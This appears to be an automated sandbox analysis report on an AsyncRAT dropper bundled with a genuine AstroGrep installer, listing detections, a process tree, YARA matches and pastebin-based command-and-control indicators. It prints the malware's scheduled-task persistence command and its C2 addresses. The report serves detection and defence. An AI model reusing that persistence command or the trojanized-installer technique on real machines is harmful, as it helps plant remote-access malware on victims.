
Windows Analysis Report ms.bin

Overview

General Information

Sample Name: ms.bin (renamed file extension from bin to exe)
Analysis ID: 450276
MD5: dbbb611daf3abd47972ae4faf5d54c95
SHA1: 1b33772f2acc9e6673a2922587b00db86f5fba01
SHA256: d5a8b6cb7b39d6f71ce67c6c8e17030079f2778087ee12c0ad45bd823f7bd53c
Tags: Asyncexe

Detection

AsyncRAT
Score: 52
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AsyncRAT
.NET source code contains potential unpacker
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Regsvr32 Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Process Tree

  • System is w10x64
  • ms.exe (PID: 4156 cmdline: 'C:\Users\user\Desktop\ms.exe' MD5: DBBB611DAF3ABD47972AE4FAF5D54C95)
    • ASTRO-GREP.EXE (PID: 5416 cmdline: 'C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE' MD5: 432F0E0AAB658DE046D8B41D2CEF8253)
      • cmd.exe (PID: 912 cmdline: 'C:\Windows\System32\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn 'astro-grep' /tr ''C:\Users\user\AppData\Roaming\astro-grep.exe'' & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 3820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5996 cmdline: schtasks /create /f /sc onlogon /rl highest /tn 'astro-grep' /tr ''C:\Users\user\AppData\Roaming\astro-grep.exe'' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 3352 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmp7B21.tmp.bat'' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 1364 cmdline: timeout 3 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
        • astro-grep.exe (PID: 2792 cmdline: 'C:\Users\user\AppData\Roaming\astro-grep.exe' MD5: 432F0E0AAB658DE046D8B41D2CEF8253)
    • ASTROGREP_SETUP_V4.4.7.EXE (PID: 3728 cmdline: 'C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE' MD5: A708211241313FEAF9621E571631534D)
  • astro-grep.exe (PID: 748 cmdline: C:\Users\user\AppData\Roaming\astro-grep.exe MD5: 432F0E0AAB658DE046D8B41D2CEF8253)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
ms.exe | Malware_QA_update | VT Research QA uploaded malware - file update.exe | Florian Roth |
  • 0xa0a8:$x4: C:\Users\DarkCoderSc\
  • 0xa0c5:$x5: Celesty Binder\Stub\STATIC\Stub.pdb
ms.exe | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
C:\Users\user\AppData\Roaming\astro-grep.exe | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000002.250713765.0000000002A4E000.00000004.00000001.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
0000000D.00000000.253043295.0000000000772000.00000002.00020000.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
00000003.00000000.197769647.00000000005F2000.00000002.00020000.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
00000003.00000002.250001680.00000000005F2000.00000002.00020000.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
(5 of 7 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
17.2.astro-grep.exe.430000.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
3.0.ASTRO-GREP.EXE.5f0000.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
1.2.ms.exe.a3f330.2.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
13.2.astro-grep.exe.770000.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
3.2.ASTRO-GREP.EXE.5f0000.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
(5 of 11 entries shown)

Sigma Overview

System Summary:

Sigma detected: Regsvr32 Anomaly
Source: Process started, Author: Florian Roth, oscd.community, Data: Command: 'C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE' , CommandLine: 'C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE' , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE, NewProcessName: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE, OriginalFileName: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE, ParentCommandLine: 'C:\Users\user\Desktop\ms.exe' , ParentImage: C:\Users\user\Desktop\ms.exe, ParentProcessId: 4156, ProcessCommandLine: 'C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE' , ProcessId: 5416

Jbx Signature Overview


AV Detection:

Antivirus / Scanner detection for submitted sample
Source: ms.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\astro-grep.exe Avira: detection malicious, Label: TR/Dropper.Gen
Multi AV Scanner detection for submitted file
Source: ms.exe Virustotal: Detection: 78%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\astro-grep.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: ms.exe Joe Sandbox ML: detected
Source: 3.0.ASTRO-GREP.EXE.5f0000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 3.2.ASTRO-GREP.EXE.5f0000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 17.2.astro-grep.exe.430000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 13.2.astro-grep.exe.770000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 1.0.ms.exe.a30000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 17.0.astro-grep.exe.430000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 1.0.ms.exe.a4b130.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.0.astro-grep.exe.770000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 1.2.ms.exe.a4b130.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.ms.exe.a30000.1.unpack Avira: Label: TR/Dropper.Gen
Source: ms.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown HTTPS traffic detected: 104.23.98.190:443 -> 192.168.2.3:49727 version: TLS 1.0
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE Window detected: Nullsoft Install System v3.0rc1 License Agreement dialog ("Please review the license terms before installing AstroGrep v4.4.7."), followed by the text of the GNU General Public License, Version 2, June 1991 (license text truncated in the report)
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE File created: C:\Program Files (x86)\AstroGrep\license.txt
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE File created: C:\Program Files (x86)\AstroGrep\readme.txt
Source: ms.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: Re:\code\projects\c#\AstroGrep\svn\AdminProcess\obj\Release\AstroGrep.AdminProcess.pdb- source: AstroGrep.AdminProcess.exe.5.dr
Source: Binary string: e:\code\projects\c#\AstroGrep\svn\AstroGrep.Common\obj\Release\AstroGrep.Common.pdb source: AstroGrep.Common.dll.5.dr
Source: Binary string: C:\Users\DarkCoderSc\Desktop\Celesty Binder\Stub\STATIC\Stub.pdb source: ms.exe
Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net40-client\NLog.pdbSHA256 source: ASTROGREP_SETUP_V4.4.7.EXE, 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp, NLog.dll.5.dr
Source: Binary string: c:\work\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\ICSharpCode.AvalonEdit.pdb source: ICSharpCode.AvalonEdit.dll.5.dr
Source: Binary string: e:\code\projects\c#\AstroGrep\svn\libAstroGrep\obj\Release\libAstroGrep.pdb@ source: libAstroGrep.dll.5.dr
Source: Binary string: .exe;.dll;.pdb;.msi;.sys;.ppt;.gif;.jpg;.jpeg;.png;.bmp;.class;.chm+{0}{4}{1}{4}{2}{4}{3} source: AstroGrep.exe.5.dr
Source: Binary string: e:\code\projects\c#\AstroGrep\svn\libAstroGrep\obj\Release\libAstroGrep.pdb source: libAstroGrep.dll.5.dr
Source: Binary string: &C:\Users\DarkCoderSc\Desktop\Celesty Binder\Stub\STATIC\Stub.pdb source: ms.exe
Source: Binary string: c:\work\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\ICSharpCode.AvalonEdit.pdbT source: ICSharpCode.AvalonEdit.dll.5.dr
Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net40-client\NLog.pdb source: ASTROGREP_SETUP_V4.4.7.EXE, 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp, NLog.dll.5.dr
Source: Binary string: e:\code\projects\c#\AstroGrep\svn\AdminProcess\obj\Release\AstroGrep.AdminProcess.pdb source: AstroGrep.AdminProcess.exe.5.dr
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE Code function: 5_2_00406033 FindFirstFileA,FindClose,5_2_00406033
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE Code function: 5_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_004055D1
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE Code function: 5_2_00402688 FindFirstFileA,5_2_00402688
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Networking:

Connects to a pastebin service (likely for C&C)
Source: unknown DNS query: name: pastebin.com
Source: global traffic TCP traffic: 192.168.2.3:49728 -> 185.195.232.251:57667
Source: Joe Sandbox View IP Address: 104.23.98.190
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown HTTPS traffic detected: 104.23.98.190:443 -> 192.168.2.3:49727 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 185.195.232.251
Source: unknown DNS traffic detected: queries for: pastebin.com
Source: AstroGrep.exe.5.dr String found in binary or memory: http://astrogrep.sourceforge.net
Source: AstroGrep.exe.5.dr String found in binary or memory: http://astrogrep.sourceforge.net/Ihttp://www.gnu.org/copyleft/gpl.html
Source: AstroGrep.exe.5.dr String found in binary or memory: http://astrogrep.sourceforge.net/download/
Source: AstroGrep.Common.dll.5.dr String found in binary or memory: http://astrogrep.sourceforge.net/version.htmlUhttp://astrogrep.sourceforge.net/download/Whttps://sou
Source: astro-grep.exe, 0000000D.00000002.462195742.0000000002B3F000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/CloudflareIncRSACA-2.crt0
Source: astro-grep.exe, 0000000D.00000002.462195742.0000000002B3F000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/CloudflareIncRSACA-2.crl07
Source: astro-grep.exe, 0000000D.00000002.462195742.0000000002B3F000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: astro-grep.exe, 0000000D.00000002.462195742.0000000002B3F000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/CloudflareIncRSACA-2.crl0
Source: AstroGrep.exe.5.dr String found in binary or memory: http://downloads.sourceforge.net/astrogrep/
Source: AstroGrep.exe.5.dr String found in binary or memory: http://downloads.sourceforge.net/astrogrep/readme.txt
Source: ICSharpCode.AvalonEdit.dll.5.dr String found in binary or memory: http://icsharpcode.net/sharpdevelop/avalonedit
Source: ICSharpCode.AvalonEdit.dll.5.dr String found in binary or memory: http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.Highlighting
Source: ICSharpCode.AvalonEdit.dll.5.dr String found in binary or memory: http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.HighlightingQ
Source: ICSharpCode.AvalonEdit.dll.5.dr String found in binary or memory: http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008
Source: ICSharpCode.AvalonEdit.dll.5.dr String found in binary or memory: http://icsharpcode.net/sharpdevelop/syntaxdefinition/20081Error
Source: NLog.dll.5.dr String found in binary or memory: http://nlog-project.org/dummynamespace/
Source: NLog.dll.5.dr String found in binary or memory: http://nlog-project.org/ws/
Source: NLog.dll.5.dr String found in binary or memory: http://nlog-project.org/ws/3
Source: NLog.dll.5.dr String found in binary or memory: http://nlog-project.org/ws/5
Source: NLog.dll.5.dr String found in binary or memory: http://nlog-project.org/ws/ILogReceiverOneWayServer/ProcessLogMessages
Source: NLog.dll.5.dr String found in binary or memory: http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesResponsep
Source: NLog.dll.5.dr String found in binary or memory: http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesT
Source: NLog.dll.5.dr String found in binary or memory: http://nlog-project.org/ws/T
Source: ASTROGREP_SETUP_V4.4.7.EXE, ASTROGREP_SETUP_V4.4.7.EXE, 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp, ms.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: ASTROGREP_SETUP_V4.4.7.EXE, 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp, ASTROGREP_SETUP_V4.4.7.EXE, 00000005.00000003.256251943.000000000074E000.00000004.00000001.sdmp, ms.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: astro-grep.exe, 0000000D.00000002.462195742.0000000002B3F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: astro-grep.exe, 0000000D.00000002.462195742.0000000002B3F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: astro-grep.exe, 0000000D.00000002.462195742.0000000002B3F000.00000004.00000001.sdmp String found in binary or memory: http://pastebin.com
Source: astro-grep.exe String found in binary or memory: http://schemas.microsof
Source: NLog.dll.5.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: ASTRO-GREP.EXE, 00000003.00000002.250692664.0000000002A34000.00000004.00000001.sdmp, astro-grep.exe, 0000000D.00000002.462172433.0000000002B2D000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: astro-grep.exe, 0000000D.00000002.462195742.0000000002B3F000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com/CPS0v
Source: AstroGrep.exe.5.dr String found in binary or memory: http://www.gnu.org/copyleft/gpl.html
Source: AstroGrep.exe.5.dr String found in binary or memory: http://www.gnu.org/copyleft/gpl.html#SEC3
Source: NLog.dll.5.dr String found in binary or memory: https://nlog-project.org/
Source: astro-grep.exe, 0000000D.00000002.462172433.0000000002B2D000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com
Source: astro-grep.exe, 00000011.00000002.310812731.0000000002781000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/raw
Source: astro-grep.exe, 00000011.00000002.310812731.0000000002781000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/raw/VTByvKGM
Source: astro-grep.exe, 0000000D.00000002.462183818.0000000002B36000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com43l
Source: astro-grep.exe, 0000000D.00000002.462364002.0000000002CB8000.00000004.00000001.sdmp, astro-grep.exe, 0000000D.00000002.462336171.0000000002C73000.00000004.00000001.sdmp, astro-grep.exe, 0000000D.00000002.462353763.0000000002C96000.00000004.00000001.sdmp, astro-grep.exe, 0000000D.00000002.462305606.0000000002C51000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.comD83l
Source: astro-grep.exe, 0000000D.00000002.462235560.0000000002B82000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.comD83lh;
Source: astro-grep.exe, 0000000D.00000002.462195742.0000000002B3F000.00000004.00000001.sdmp, astro-grep.exe, 0000000D.00000002.462364002.0000000002CB8000.00000004.00000001.sdmp String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: astro-grep.exe, 0000000D.00000002.462195742.0000000002B3F000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: ASTROGREP_SETUP_V4.4.7.EXE, 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp, NLog.dll.5.dr String found in binary or memory: https://www.nuget.org/packages/NLog.Web.AspNetCore
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727

                            Key, Mouse, Clipboard, Microphone and Screen Capturing:

                            barindex
                            Yara detected AsyncRATShow sources
                            Source: Yara matchFile source: ms.exe, type: SAMPLE
                            Source: Yara match File source: 17.2.astro-grep.exe.430000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 3.0.ASTRO-GREP.EXE.5f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 1.2.ms.exe.a3f330.2.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 13.2.astro-grep.exe.770000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 3.2.ASTRO-GREP.EXE.5f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 17.0.astro-grep.exe.430000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 3.2.ASTRO-GREP.EXE.2a4e31c.2.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 13.0.astro-grep.exe.770000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 3.2.ASTRO-GREP.EXE.2a4e31c.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 1.0.ms.exe.a3f330.1.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 1.0.ms.exe.a30000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 1.0.ms.exe.a3f330.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 1.2.ms.exe.a30000.1.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 1.2.ms.exe.a3f330.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 00000003.00000002.250713765.0000000002A4E000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match File source: 0000000D.00000000.253043295.0000000000772000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000003.00000000.197769647.00000000005F2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000003.00000002.250001680.00000000005F2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000001.00000000.195464436.0000000000A3F000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000011.00000002.310239259.0000000000432000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000011.00000000.259955019.0000000000432000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara match File source: 0000000D.00000002.460832273.0000000000772000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara match File source: Process Memory Space: astro-grep.exe PID: 748, type: MEMORY
                            Source: Yara match File source: Process Memory Space: astro-grep.exe PID: 2792, type: MEMORY
                            Source: Yara match File source: Process Memory Space: ASTRO-GREP.EXE PID: 5416, type: MEMORY
                            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE, type: DROPPED
                            Source: Yara match File source: C:\Users\user\AppData\Roaming\astro-grep.exe, type: DROPPED
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE Code function: 5_2_00405086 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard

                            System Summary:

                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE Code function: 5_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE Code function: 3_2_00F28148
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE Code function: 3_2_00F2B258
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE Code function: 3_2_00F2E5B0
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE Code function: 3_2_00F27878
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE Code function: 3_2_00F27130
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE Code function: 5_2_004048C5
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE Code function: 5_2_004064CB
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE Code function: 5_2_00406CA2
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exe Code function: 13_2_00EA8148
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exe Code function: 13_2_00EAE5B0
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exe Code function: 13_2_00EA7878
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exe Code function: 13_2_00EA7130
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exe Code function: 13_2_00EACD60
                            Source: ms.exe Static PE information: Resource name: RBIND type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: ms.exe Static PE information: Resource name: RBIND type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Source: ms.exe Static PE information: Resource name: RBIND type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Source: ms.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: ms.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: ms.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: ASTROGREP_SETUP_V4.4.7.EXE.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: ASTROGREP_SETUP_V4.4.7.EXE.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: ASTROGREP_SETUP_V4.4.7.EXE.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: AstroGrep.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: ms.exe, 00000001.00000002.200160111.0000000002430000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs ms.exe
                            Source: ms.exe, 00000001.00000002.199948307.00000000009F0000.00000002.00000001.sdmp Binary or memory string: originalfilename vs ms.exe
                            Source: ms.exe, 00000001.00000002.199948307.00000000009F0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs ms.exe
                            Source: ms.exe Binary or memory string: OriginalFilenameStub.exe" vs ms.exe
                            Source: ms.exe Binary or memory string: OriginalFilenameAstroGrep_Setup_v4.4.7.exe@ vs ms.exe
                            Source: ms.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                            Source: ms.exe, type: SAMPLE Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
                            Source: 1.0.ms.exe.a30000.0.unpack, type: UNPACKEDPE Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
                            Source: 1.2.ms.exe.a30000.1.unpack, type: UNPACKEDPE Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
